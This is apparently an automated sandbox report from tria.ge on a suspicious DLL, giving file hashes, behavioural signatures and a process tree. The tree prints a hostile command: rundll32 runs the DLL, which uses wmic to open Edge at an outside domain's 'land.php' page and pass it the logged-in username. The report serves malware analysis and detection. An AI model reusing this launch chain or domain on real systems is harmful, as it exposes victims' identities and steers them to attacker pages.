Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
30/08/2023, 02:03
Static task
static1
Behavioral task
behavioral1
Sample
AppvIsvSubsystems64.dll
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
AppvIsvSubsystems64.dll
Resource
win10v2004-20230703-en
General
-
Target
AppvIsvSubsystems64.dll
-
Size
6.8MB
-
MD5
4ce8c27aa4f502d34fa2822990fbe5d3
-
SHA1
303a0b8575e36ed6db6132cd9f47d1955fd8d9cf
-
SHA256
91106d4e005f48f634db468fa7de022e894b7fa3dfa3f98aa69c7a3cfdf1b394
-
SHA512
710321c017f580c9c83bfa0663cd7977cd787b73cd57acdb860fa76789fdafd6a1123d16af6cea78e09c89d2aa2a9b72f353f536786a5ab71fc8efcf7c0bc16a
-
SSDEEP
6144:ZZ2tm6+5KpAEAjYOBs93caMSbOSrPBzQ3TR4crBRO0:Hv6AxjtBs/fCswTtXz
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3016 4400 msedge.exe 84 -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 5096 msedge.exe 5096 msedge.exe 3016 msedge.exe 3016 msedge.exe 3228 identity_helper.exe 3228 identity_helper.exe 3000 msedge.exe 3000 msedge.exe 3000 msedge.exe 3000 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1576 wmic.exe Token: SeSecurityPrivilege 1576 wmic.exe Token: SeTakeOwnershipPrivilege 1576 wmic.exe Token: SeLoadDriverPrivilege 1576 wmic.exe Token: SeSystemProfilePrivilege 1576 wmic.exe Token: SeSystemtimePrivilege 1576 wmic.exe Token: SeProfSingleProcessPrivilege 1576 wmic.exe Token: SeIncBasePriorityPrivilege 1576 wmic.exe Token: SeCreatePagefilePrivilege 1576 wmic.exe Token: SeBackupPrivilege 1576 wmic.exe Token: SeRestorePrivilege 1576 wmic.exe Token: SeShutdownPrivilege 1576 wmic.exe Token: SeDebugPrivilege 1576 wmic.exe Token: SeSystemEnvironmentPrivilege 1576 wmic.exe Token: SeRemoteShutdownPrivilege 1576 wmic.exe Token: SeUndockPrivilege 1576 wmic.exe Token: SeManageVolumePrivilege 1576 wmic.exe Token: 33 1576 wmic.exe Token: 34 1576 wmic.exe Token: 35 1576 wmic.exe Token: 36 1576 wmic.exe Token: SeIncreaseQuotaPrivilege 1576 wmic.exe Token: SeSecurityPrivilege 1576 wmic.exe Token: SeTakeOwnershipPrivilege 1576 wmic.exe Token: SeLoadDriverPrivilege 1576 wmic.exe Token: SeSystemProfilePrivilege 1576 wmic.exe Token: SeSystemtimePrivilege 1576 wmic.exe Token: SeProfSingleProcessPrivilege 1576 wmic.exe Token: SeIncBasePriorityPrivilege 1576 wmic.exe Token: SeCreatePagefilePrivilege 1576 wmic.exe Token: SeBackupPrivilege 1576 wmic.exe Token: SeRestorePrivilege 1576 wmic.exe Token: SeShutdownPrivilege 1576 wmic.exe Token: SeDebugPrivilege 1576 wmic.exe Token: SeSystemEnvironmentPrivilege 1576 wmic.exe Token: SeRemoteShutdownPrivilege 1576 wmic.exe Token: SeUndockPrivilege 1576 wmic.exe Token: SeManageVolumePrivilege 1576 wmic.exe Token: 33 1576 wmic.exe Token: 34 1576 wmic.exe Token: 35 1576 wmic.exe Token: 36 1576 wmic.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe 3016 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3396 wrote to memory of 1576 3396 rundll32.exe 82 PID 3396 wrote to memory of 1576 3396 rundll32.exe 82 PID 3016 wrote to memory of 2300 3016 msedge.exe 86 PID 3016 wrote to memory of 2300 3016 msedge.exe 86 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 3780 3016 msedge.exe 87 PID 3016 wrote to memory of 5096 3016 msedge.exe 88 PID 3016 wrote to memory of 5096 3016 msedge.exe 88 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89 PID 3016 wrote to memory of 1188 3016 msedge.exe 89
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\AppvIsvSubsystems64.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\System32\Wbem\wmic.exewmic process call create 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe https://word.v2310.zip/land.php?username=Admin'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://word.v2310.zip/land.php?username=Admin1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc950846f8,0x7ffc95084708,0x7ffc950847182⤵PID:2300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:22⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:82⤵PID:1188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:12⤵PID:5008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:12⤵PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:12⤵PID:1428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:82⤵PID:1480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:12⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵PID:2004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,16192649508811379575,14275240246342451569,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1828 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3000
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3448
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:788
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD570e2e6954b953053c0c4f3b6e6ad9330
SHA1cb61ba67b3bffa1d833bb85cc9547669ec46f62f
SHA256f6e770a3b88ad3fda592419b6c00553bdadc50d5fb466ef872271389977f2ab4
SHA512eeacb0e62f68f56285f7605963ca9bb82f542d4e2ccc323266c08c9990cecdebd574e1ab304ae08ea8c6c94c50683180f83562f972e92799ebbcfcd8f503fb5a
-
Filesize
505B
MD58dab1dbbf26f275f4f10c9d7951607e0
SHA16ddc5e3101688657e60c8d1f8734511c1f314e17
SHA2568db6770fce64427494d4674b2229e8924bfe7c2a9151a5c39e12ef62f53169af
SHA51224e29bb0adf0e59f3db3a29853852b46215e19666fe9a6feef548294379c450f3ae94fd5f00f2d35d8a63725ea5013ebdeb29eea8f9ac2af3430dafacc6571c0
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
5KB
MD510ce07dbadca9a94b11aea2d99154081
SHA128924fd671b9d867b7233e58c80f176a90943585
SHA256fd563ea1ba1b1cf9332db6b0fea9b6ef693ec3aac5f594638872a706a5ea6672
SHA512da187fa2efe7b115767e77c7663bc7fd25b534a9ba8299bf151ecb20f183009375ecbee57b83063223296d6fb118587c55b624a04285a179371dc52125843d3a
-
Filesize
5KB
MD54ae627ed02b0431a323311a50616d1f9
SHA1d5e26b1fb4a91903503e39e2fa68c89398907b73
SHA25676554519c1fe54a6414018d3a33c18329d65f219be1fc5b72b4b34d3d4474162
SHA512b2e0c61cc3c478e8fb78ef3a166f07960b93f13f14dedfb62a7ad2df377aa88242d62a0cb4749fc5a114cf1381dddf5e53595cd22fa3287f300d97d0ef75b1dd
-
Filesize
24KB
MD55a478f1e08816969e8214f982850b754
SHA11cf5e7192f3c6e31c7e27b6cb34ebf89036eec0c
SHA256665cf5612c61412c9acc928b1e155c8f11ae83905ce614d9a1a7ad72cc0fd489
SHA5127e7ff60c157841f6f5bb206ebbce29f6df3a6c0c671805415ad7226654e13da49ad76e39a6d0afe28992348f3b5685ecacbfb44178fd61998c54caebbfd97832
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD59c1e67a25300e1595c9e69348f291b85
SHA1173d2929a169230f8606afb4ee88a06d30b96180
SHA2560600f02e2c0e7acf7e84cc80666f65a7114e4638e32ea4c8b419550554777ab5
SHA512da98544838df6d5093dc1d72d568c13344868725c41ce6771512cf9bfd997dd8e8b1205d288b5cab7ce5d413de6ab4b5575bd2438c86f5a36cefac2ba19a626c